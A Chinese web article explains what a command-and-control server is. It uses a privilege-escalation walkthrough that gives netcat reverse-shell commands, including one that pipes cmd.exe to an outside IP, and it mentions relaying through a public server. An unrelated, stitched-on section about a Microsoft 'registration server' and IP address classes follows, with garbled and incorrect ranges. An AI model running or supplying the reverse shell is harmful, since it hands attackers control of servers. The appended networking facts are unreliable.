什么是C&C服务器

什么是C&C服务器,第1张

C&C

服务器的全称是

Command

and

Control

Server,翻译过来就是命令和控制服务器

通常在做渗透测试的时候,在拿到一个

webshell

的时候,需要对服务器进行提权操作,如果是一台

windows

的服务器,提权的时候通常是利用本地提权漏洞的

exp

进行溢出提权,有些

exp

可以直接在后面加参数,溢出成功之后执行参数中的命令。

而有的

exp

溢出成功之后是返回一个

system

权限的

cmd,这时就需要将低权限的

cmd

shell

反弹回本地,这里用

nc

在本地执行:nc

-vv

-lp

3333

上述命令的意思是在本地监听一个

3333

端口等待连接,假设电脑

IP

公网的,并且

IP

114.114.114.114,然后在目标服务器就可以执行:nc

114.114.114.114

3333

-e

cmd.exe

上面的命令就可以把远程服务器的服务器权限的

cmd

shell

返回到本地,这时你就可以通过

nc

建立的这个

shell

进行通信,发送你要执行的命令,在远程服务器接收到命令之后执行并将结果返回,这时本机电脑就是一个简易的

C&C

服务器。

扩展资料:

C&C

服务器使目标机器可以接收来自服务器的命令,从而达到服务器控制目标机器的目的。该方法常用于病毒木马控制被感染的机器。

通常只有这样内网的服务器才可以访问进行连接,所以可以使用一台中转服务器,这台中转服务器有一个公网

IP

地址是:111.111.111.111,这样不管是目标服务器还是我们本机都可以访问这台中转服务器。

这里中转服务器的作用就是本地内网的主机监听的端口映射到公网

IP

的某个端口,这样目标机访问中转服务器监听的端口就相当于访问了我们本地监听的端口。

microsoft(c)注册服务器通过运行cmd命定打开。microsoft(c)注册服务器是在安装程序式,会弹出的一个窗口命令,想要打开microsoft(c)注册服务器解决问题,在电脑搜索程序中输入cmd命令回车,调出窗口,进行命令口令输入即可打开。

段C:一般指段C网络段,也称为“段C渗透”IP范围192.0.0.1到223.255.255.254

段C服务器:为站集群服务器的IP网络段。IP地址是C段。

C段服务器的本质是C级IP段。

扩展资料:

B类地址:

172.16.0.0到172.31.255.255是私有地址,169.254.0.0到169.254.255.255是保留地址。

类D地址:

不反映网络的大小,但仅用于组播,以指定指定接收组播的节点组,组播由组播订阅的成员组成。

类地址的范围从224.0.0.0到239.255.255.255。

类地址(240.0.0.0-255.255.254)用于测试。


欢迎分享,转载请注明来源:夏雨云

原文地址:https://www.xiayuyun.com/zonghe/73274.html

(0)
打赏 微信扫一扫微信扫一扫 支付宝扫一扫支付宝扫一扫
上一篇 2023-03-02
下一篇2023-03-02

发表评论

登录后才能评论

评论列表(0条)

    保存